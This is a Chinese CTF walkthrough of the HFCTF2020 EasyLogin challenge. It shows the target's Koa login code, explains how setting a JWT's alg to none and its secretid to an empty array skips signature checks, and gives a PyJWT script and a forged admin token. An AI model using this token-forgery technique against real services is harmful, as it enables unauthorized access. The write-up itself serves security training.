BUUCTF---[HFCTF2020]EasyLogin保姆级详解。

 

题目链接： BUUCTF在线评测

考点

分析

下面是修改前后这些值的注意事项：

---

题目链接： BUUCTF在线评测

考点：

JS代码审计

jwt漏洞破解

分析：

打开题目,给了个登录框

 

 没发现什么可以利用的，查看源代码，点击康康：

 

 

 分析可知，该题采用了koa框架，在getflag函数里发现有个/api/flag，应该是有返回flag的函数。

接着的话先附上koa项目的文件框架：

 按照koa框架的常见结构去获取下控制器文件的源码。

/controllers/api.js

访问得到整个题目的源代码：

const crypto = require('crypto');
const fs = require('fs')
const jwt = require('jsonwebtoken')

const APIError = require('../rest').APIError;

module.exports = {
    'POST /api/register': async (ctx, next) => {
        const {username, password} = ctx.request.body;

        if(!username || username === 'admin'){
            throw new APIError('register error', 'wrong username');
        }

        if(global.secrets.length > 100000) {
            global.secrets = [];
        }

        const secret = crypto.randomBytes(18).toString('hex');
        const secretid = global.secrets.length;
        global.secrets.push(secret)

        const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});

        ctx.rest({
            token: token
        });

        await next();
    },

    'POST /api/login': async (ctx, next) => {
        const {username, password} = ctx.request.body;

        if(!username || !password) {
            throw new APIError('login error', 'username or password is necessary');
        }

        const token = ctx.header.authorization || ctx.request.body.authorization || ctx.request.query.authorization;

        const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;

        console.log(sid)

        if(sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) {
            throw new APIError('login error', 'no such secret id');
        }

        const secret = global.secrets[sid];

        const user = jwt.verify(token, secret, {algorithm: 'HS256'});

        const status = username === user.username && password === user.password;

        if(status) {
            ctx.session.username = username;
        }

        ctx.rest({
            status
        });

        await next();
    },

    'GET /api/flag': async (ctx, next) => {
        if(ctx.session.username !== 'admin'){
            throw new APIError('permission error', 'permission denied');
        }

        const flag = fs.readFileSync('/flag').toString();
        ctx.rest({
            flag
        });

        await next();
    },

    'GET /api/logout': async (ctx, next) => {
        ctx.session.username = null;
        ctx.rest({
            status: true
        })
        await next();
    }
};

重点看看这两个函数，一个是生成jwt的，另一个是返回flag的。

 

 注意到/apu/flag路径校验为admin用户时才会返回flag，而登录验证方式采用的是JWT，所以可以尝试对JWT进行破解修改。，并且生成JWT是用HS256加密，可以把它改为none来进行破解。标题中的alg字段更改为none，有些JWT库支持无算法，即没有签名算法。当alg为none时，后端将不执行签名验证。 此外对于本题中验证采用的密匙secret值也需要为空或者undefined否则还是会触发验证，所以将JWT中secretid项修改为[]。

综上所述，一共要修改三个地方：

第一个是username，修改为admin

第二个是alog，修改为none

第三个是secretid，修改为[]

下面是修改前后这些值的注意事项：

首先，要获取自己的jwt值，需要用burpsuite登录抓包，如下图：

 然后复制authorization后面的内容，也就是你自己的jwt，放到JSON Web Tokens - jwt.io，查看各个值：

 按照刚刚要修改的三个值修改，由于要修改alg为none，在网页上无法直接获取新的jwt，所以用python脚本生成，在此之前先用pip安装好生成jwt的库：PyJWT库。

脚本如下：

 值得注意的是这里的iat，是要用你自己在burpsuite里拿到的jwt里的iat值。运行得到新的jwt值。

import jwt
token = jwt.encode(
{
  "secretid": [],
  "username": "admin",
  "password": "123456",
  "iat": 1662825424
},
algorithm="none",key="").encode(encoding='utf-8')

print(token)

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6IjEyMzQ1NiIsImlhdCI6MTY2MjgyNTQyNH0.

返回burpsuite：

 确定username为admin，且jwt为新生成的jwt后，放包，回到浏览器，访问

/api/flag

拿到flag：

 

flag{b5f20dce-277f-4004-8c99-161af08272b2}

到这里该题就解到这里了，这里附上一道也是jwt类型的题目：

[2019 CISCN ]华北赛区 Day1 Web2：BUUCTF在线评测，题目是关于ikun的噢。

写的一般，见谅！不懂的欢迎私信！

谢谢点赞！